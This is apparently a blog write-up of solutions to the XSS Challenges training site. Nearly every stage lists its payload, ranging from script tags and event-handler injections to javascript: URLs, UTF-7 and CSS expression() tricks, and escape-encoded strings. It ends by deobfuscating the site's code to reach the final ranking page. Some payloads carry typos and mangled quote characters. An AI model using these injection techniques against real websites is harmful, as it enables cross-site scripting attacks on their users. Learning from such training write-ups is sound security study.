Here’s my journal to solve all the XSS Challenges writed by yamagata21 on http://xss-quiz.int21h.jp/, This is an starter level to people who want to learn some cross-site scripting and its several ways to inject on differents browsers.
XSS Challenges http://xss-quiz.int21h.jp
Stage1: http://xss-quiz.int21h.jp
Solution: <script>alert(document.domain);</script>
Stage2: http://xss-quiz.int21h.jp/stage2.php?sid=e93e71eed43c3ab5668af6a5aa603cf66eedce70
Solution: «><script>alert( alert(document.domain))</script>
Stage3: http://xss-quiz.int21h.jp/stage-3.php?sid=d362dd49b96c30f3e9a4a6ea0abafb0cef59ed2d
Solution: The input in text box is properly escaped («><script>alert(document.domain);</script> in select)
Stage4: http://xss-quiz.int21h.jp/stage_4.php?sid=d47663090ecc0b8d55ae73ee3753ead52c63103e
Solution: «><script>alert(document.domain);</script> in hidden field
Stage5: http://xss-quiz.int21h.jp/stage–5.php?sid=e9dd07b6e86c5314a2e574e887faa9482de330bf
Solution: » onmouseover=»alert(document.domain);» type=»text changing lenght in input text
Stage6: http://xss-quiz.int21h.jp/stage-no6.php?sid=b76ebfa651652f2c22f8ddbe264941287667706c
Solution: » onmouseover=»alert(document.domain);»
Stage7: http://xss-quiz.int21h.jp/stage07.php?sid=f433ab35e367d5a94100aa4e0f694c3e63d67105
Solution: x onmouseover=alert(document.domain);
Stage8: http://xss-quiz.int21h.jp/stage008.php?sid=4301b185b563c91208e0af232d7f016885e863e0
Solution: javascript:alert(document.domain);
Stage9: utf-7: Not working for me, extracted next level from deobfusucate url.
http://xss-quiz.int21h.jp/stage_09.php?sid=558484a712d793c446e3dc409601eaf126e73d25
Solution:+ACI- onmouseover=+ACI-alert(document.domain)+ADsAIg- x=+ACI-
p1=1%2bACI- onmouseover=%2bACI-alert(document.domain)%2bADsAIg-&charset=euc-jp
Stage10: http://xss-quiz.int21h.jp/stage00010.php?sid=1b96f5c206c187751811fb9267a02c109c7e1276
Solution: » onmouseover=alert(document.domdomainain); x=»
Stage11: http://xss-quiz.int21h.jp/stage11th.php?sid=756e90d9a168c24e2abbc43d1f4409ce6ff70de3
Solution: «><a href=»javascr	ipt:alert(document.domain);»>XSS</a>
Passed with IE
Stage12: http://xss-quiz.int21h.jp/stage_no012.php?sid=188b00a4305c62ea415313484b57a9a3b59df5cb
Solution: «onmouseover=alert(document.domain);
Passed with IE
Stage13: http://xss-quiz.int21h.jp/stage13_0.php?sid=49a2e48f78ade853ecd72a274e49102a9b096fad
Solution: xss:expression(alert(document.domain));»
Passed with IE
Stage14: http://xss-quiz.int21h.jp/stage-_-14.php?sid=cdfba63593b9c07d7b1b7e41790aa5de3ac4bcd8
Solution: xss:expre/**/ssion(alert(document.domain));»
Stage15: http://xss-quiz.int21h.jp/stage__15.php?sid=26ac2a0522c04a788c217fd8d7847aab1626f726
Solution: \\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e
Stage16: http://xss-quiz.int21h.jp/stage00000016.php?sid=67973758e07ac879612c31437a2e1fb283b760e7
Solution: \\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e
Skipped: (Old IE not avalaible)
http://xss-quiz.int21h.jp/stage-No17.php?sid=53342e06720dc7d4fa4224eb3c13bf966d823056
http://xss-quiz.int21h.jp/stage__No18.php?sid=170f1d30f88cf627174033ec5b73578276b94fc3
Stage19: http://xss-quiz.int21h.jp/stage_–19.php?sid=787870a01e603b0c0d0d6c464c0595883e2c10ce
Solution: It’s DOMXSS Twitter’s bug (24 Sept.2010) — #!javascript:alert(document.domain)
Clear Stage: Need to entry the ranking deobfuscating js on this part of the code:
ty = «»;
o = unescape(«foejoh»);
for (var i = 0; i < o.length; i++) {
var y = o.charCodeAt(i);
ty += String.fromCharCode(y – 1)
}
ty = escape(ty);
if (ty == «ending») {
sj = «\062\060»;
alert(«Congratulations!! All Stages Clear!!!»);
alert(«\x52\x61\x6e\x6b\x49\x6e\x67» + sj + «.php»);
document.location = «\x52\x61\x6e\x6b\x49\x6e\x67» + sj + «.php»
} else {
document.all(«msg»).innerHTML = «<span id=’h3′>Congratulations!!</span> » + «Next stage <a href=\»» + ty + «\»>» + ty + «</a>.»
}
so «\x52\x61\x6e\x6b\x49\x6e\x67» + sj + «.php» is RankIng20.php :-)
Final URL that allow entry directly in the clear stage. http://xss-quiz.int21h.jp/RankIng20.php
Ranking: http://xss-quiz.int21h.jp/ranking.php
random
marzo 7, 2017嘻嘻